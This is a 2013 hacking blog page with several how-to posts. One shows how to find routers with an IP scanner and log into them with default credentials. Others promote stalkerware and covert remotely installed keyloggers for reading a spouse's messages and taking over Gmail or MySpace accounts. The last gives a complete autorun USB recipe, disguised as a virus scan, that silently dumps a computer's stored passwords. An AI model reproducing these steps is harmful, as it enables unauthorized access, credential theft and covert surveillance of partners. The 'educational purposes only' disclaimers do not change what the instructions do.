Web Analytics

ad

Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Saturday, September 28, 2013

How to Hack an Ethernet ADSL Router

Hack ADSL RoutersAlmost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet. However, most of them are unaware of the fact that it has a serious vulnerability in it which can easily be exploited by anyone with a basic knowledge of computer. In this post, I will show you how to hack an Ethernet ADSL router by exploiting the common vulnerability that lies in it.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later.
This makes it possible for the attackers to gain unauthorized access to the router and modify its settings using a common set of default usernames and passwords. Here is how you can do it. Before you proceed, you need the following tool in the process:

Hacking the ADSL Router:

Here is a detailed information on how to exploit the vulnerability of an ADSL router:
  1. Go to www.whatismyipaddress.com. Once the page is loaded, you will find your IP address. Note it down.
  2. Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
  3. Suppose your IP is 117.192.195.101, you can set the range something as 117.192.194.0 to 117.192.200.255so that there exists at least 200-300 IP addresses in the range.
  4. Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
  5. IP Scanner Settings
    I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Optionsinstead of Tools
  6. Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image:
  7. Angry IP Scanner
  8. Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-passwordpair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below:
Router Settings Page Hacked!
If you do not succeed to gain access, select another IP from the list and repeat the step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can a Hacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or even hijack the DNS by pointing it at a rouge DNS server. If this happens, the victim will have to reconfigure/reset the router settings in order to bring it back to normal.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

How to Spy on BBM Messages

Spy on BBM Messages
Just when we thought that BlackBerry was dead and gone, or perhaps on its last breath, the BlackBerry Corporation (formerly known as Research In Motion) released a new series of handsets at the beginning of the year with the latest version of their OS the BlackBerry 10 OS. As soon as the set was released the initial worldwide reception was enough to get just about any BlackBerry critic to admit the comeback.
So BlackBerry sets are being seen sported around again which consequently means that the company’s legendary BlackBerry Messenger service is kicking and roaring back into action. The service is an in platform messaging software which allows individuals who use the BlackBerry platform to communicate with each other through messages without incurring any extra data plan or package fee. If someone close to you owns a BlackBerry then you will be only too familiar with this service and might also get the itch to read the messages that are being exchanged. Whether you are a concerned parent or suspicious spouse, to know what’s happening in their life, you must know how to access their BBM messages. Here is how to go about it.
1. Look For BBM Spy Software: In order to get into their BBM messages, you will need the help of specially designed software that can retrieve the desired data. However, there is a dearth of good programs that will specifically target the messaging service. Many apps will allow you to access phone conversations or call logs but not the actual messages exchanged in BBM chat. So when looking for software to use, make sure it specifies itself as a Blackberry Spy app.
2. Evaluate the Options: Once you find software that can access BBM messages, pick one that suits your needs the best. If you are unable to figure out any at all, then there are two good apps for starters that you can try. Spyera is a good option that solves many problems when it comes to spying. With this one you can access BBM conversations, emails, texts and even ongoing phone calls. You can also try MobiStealth spy software. Like Spyera you can use it to access BBM messages, videos and photos but not live calls. Both of them allow for the user to monitor the target BlackBerry remotely. With MobiStealth you can receive the data from an online dashboard or private email account.
3. Download and Install: Once you have decided on BBM spy software, you need to purchase it. In order for it to work it needs to be accessed from the target’s phone. That means you must physically retrieve the BlackBerry you wish to monitor and access the Internet. Stealth would be required on your side of course. After that you proceed to downloading it from the source site. Once download is complete, begin the installation process. Once the notification of installation completion appears, you can be sure that the spy software is successfully in place. Simply wait for conversations to take place and then monitor them!

Friday, August 16, 2013

How to Hack a Gmail Password

With Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.
As a result, sometimes it becomes inevitable for people to hack the password of their spouse’s or girlfriend’s email account to reveal the secret. So, it’s no wonder why many people want to know how to hack a Gmail password.
In this post, I am going to tell you some of the Real and Working ways that actually work. However, before that, I want to make you aware of the common myths and scams associated with email hacking.
  1. There is no ready-made software program that can hack Gmail password with just a click of a button. So, stay away from those websites that are waiting to rip off your pockets by selling fake products.
  2. Most of the email hacking services on the Internet claim to hack any email password for just a small fee of say $100. I have personally tested many of those services and all I can tell you that they are nothing more than a scam.
With my experience of over 8 years in the field of ethical hacking and security, I can tell you that there are only two ways to hack Gmail or any other email password. They are:
  1. Keylogging
  2. Phishing

Keylogging: Easiest Way to Hack Gmail

Keylogging is the easiest way to gain access to any email account. Keylogging involves the use of a small software program called the keylogger (also called as a spy software). This keylogger, when installed on a given computer, will capture each and every keystroke typed on the keyboard including passwords. Keylogger operates in a complete stealth mode and thus remains undetected.
The use of keyloggers doesn’t demand any special knowledge. So, anyone with a basic knowledge of computer can install and use the keylogger. To hack the password, all you need to do is just install it on the computer of the target user. Once the victim logs into his Gmail account from his/her computer, the login details (username and password) are captured and stored instantly. You can later access the stored logs to find out the password.
But what if you do not have physical access to the target computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the following keylogger as the best:
  • SniperSpy – for Windows (Tested)
  • SniperSpy – for Mac (Tested)
If you do not have physical access then you need to use the remote installation feature to remotely deploy the keylogger.
NOTE: For more details on how to install and use SniperSpy, read my post: How to use Keyloggers?

Phishing:

Phishing is a way to capture sensitive information such as usernames, passwords and credit card details. Phishing usually involves the use of a spoofed web page (or fake website) whose look and feel is almost identical to that of the legitimate websites like Gmail, Yahoo and Hotmail. When the users try to login from these fake pages and enter their passwords there, the login details are stolen away by the hacker.
However, creating a fake login page and taking it online to successfully hack the password is not an easy job. It demands an in depth technical knowledge of HTML and scripting languages like PHP, JSP etc. In addition to that, carrying out a phishing attack is a serious criminal offence. So, if you are new to the concept of hacking passwords, then I recommend using the keyloggers as they are the easiest the safest way to hack any online password.

How to Hack a MySpace Account: MySpace Hacking

MySpace being one of the world’s largest social networks, has become today a favorite place for many to maintain secret relationships and exchange cheating messages. I myself have seen many cheaters create MySpace accounts in order to have secret relationships with another person.
So, it’s no wonder why many people want to hack MySpace account of their spouse, girlfriend or boyfriend so as to reveal the secret. Well, if you are here to know “how to hack MySpace”, then you have landed at the right place!

Is it possible to hack MySpace?

  Yes! As a matter of fact, almost anything can be hacked on the Internet. However, you must be aware of the following things before you proceed to hack MySpace:
  1. Never trust any hacking service that claims to hack a MySpace password in exchange for a fee. I have personally tried and tested many of them; all I can tell you is that they are no more than a scam.
  2. With my experience of over 8 years in the field of hacking and IT security, I can tell you that there are onlyTWO ways to hack MySpace: They are Keylogging and Phishing. All the other ways are simply scam or don’t work!
The following are the only 2 foolproof methods that work:

1. Keylogging: The easiest way

The easiest way to hack MySpace is by using a keylogger (also known as spy software). A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard.
Keylogging can not only get you the password, but also has the power to monitor each and every activity that they perform on their computer. To use a keylogger you don’t need to have any special knowledge or technical experience. Anyone with a basic knowledge of computer can install and use the keyloggers with ease.
Hence, for a novice computer user, using a keylogger can be the best way to gain access to MySpace or any other online account. With my experience, I recommend the following keylogger as the best.
Easily Access any Email
- The No.1 Keylogger (Tested)
SniperSpy is a revolutionary product that allows you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!
Gain access to MySpace with SniperSpy
Why Sniperspy is the best?
1. With my experience of over 8 years in the field of IT security, I have tried almost every software currently available and know the ins and outs of what it is and how it actually works.
2. Sniperspy is the only software that offers a complete stealth and easy access to any password. Hence I recommend SniperSpy as the best to hack MySpace password.
Here is a summary of benefits that you will receive with Sniperspy:
1. Access ANY Password
Sniperspy records every keystroke typed on the computer thereby allowing you to access any type of password protected account such as MySpace, Facebook, Hi5 and other email accounts.
2. Monitor all the Activities on the Target Computer and Access Protected MySpace Accounts
With Sniperspy, you can secretly capture the screenshots, record IM conversations, monitor their web activity and do many more…
 3. Never Get Caught
This software runs in a total stealth mode which makes it possible to record the activities without anyone knowing it. Thus, you need not worry about being traced back!
4. Remote Install Feature
No physical access to your remote PC is needed to install the spy software. You can install the software even if the PC is out of country and easily gain access to the target MySpace account!
5. Extremely Easy to Use
SniperSpy is designed for novice computer users and thus requires no special skills.
How safe is to use SniperSpy?
SinperSpy is completely safe and secure since it neither collects any information from your computer nor contact you in any way unless you request assistance. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for its users.
What are the minimum system requirements?
Any computer running on Pentium or AMD 433mhz or Better, at least 64MB RAM with Windows 2000/XP/Vista/7/8 or Mac.
Is my online order 100% secure?
Absolutely Yes! All the e-commerce transactions for SniperSpy are routed through a highly secure payment gateway. So all your information remains private and secure. So go grab SniperSpy now and expose the truth!

2. Other ways to hack Myspace account

Phishing is the most commonly used method to hack into MySpace or any other email account. This technique involves the use of Fake Login Page (also known as spoofed page). These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. Here, the victim is tricked to make him believe the fake login page to be the real one and enter his password there. But once the user attempts to login through these pages, his/her login details are stolen away by the hacker who is behind the phishing attack. Therefore phishing can be a very effective way in gaining access to password protected online accounts such as MySpace.
However, phishing requires specialized knowledge and high level skills to implement; which is not possible for a novice computer user. Also, phishing is considered as a serious crime and the attacker can go behind the bars if caught. So, I recommend the use of keyloggers as the best way to hack MySpace.
I hope this information has helped you. If you have any further queries, you can leave a comment below so that I can come up with a response. Please don’t contact me asking to hack a MySpace account for you, which I would definitely not. Kindly be advised that this website only offers information on ethical hacking and security and does not provide any sort of paid/personal hacking service

How to Hack Passwords Using a USB Drive

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox.
There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit:
MessenPassRecovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassViewRecovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE PassviewIE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassViewRecovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more.
PasswordFoxPasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed:
Record Index, Web Site, User Name, Password, User Name Field and Password Field.

Preparing Your USB Drive for Password Hacking:

Here is a step by step procedure to create the password hacking toolkit:
You must temporarily disable your antivirus before following these steps.
  1. Download all the 5 tools, extract them and copy only the executable files (.exe files) onto your USB Pendrive.
    ie: Copy the files – mspass.exemailpv.exeiepv.exepspv.exe andpasswordfox.exe into your USB Drive.
  2. Create a new Notepad and write the following text into it:
    [autorun] open=launch.bat
    ACTION= Perform a Virus Scan
    save the Notepad and rename it from New Text Document.txt to autorun.inf. Nowcopy the autorun.inf file onto your USB pen-drive.
  3. Create another Notepad and write the following text onto it:
    start mspass.exe /stext mspass.txt
    start mailpv.exe /stext mailpv.txt
    start iepv.exe /stext iepv.txt
    start pspv.exe /stext pspv.txt
    start passwordfox.exe /stext passwordfox.txt
    Save the Notepad and rename it from New Text Document.txt to launch.batCopy thelaunch.bat file to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen-drive on on any computer to sniff the stored passwords. Just follow these steps:
    1. Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive).
    2. In the pop-up window, select the first option (Perform a Virus Scan).
    3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
    4. Remove the pen-drive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP, Vista and 7.
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.
//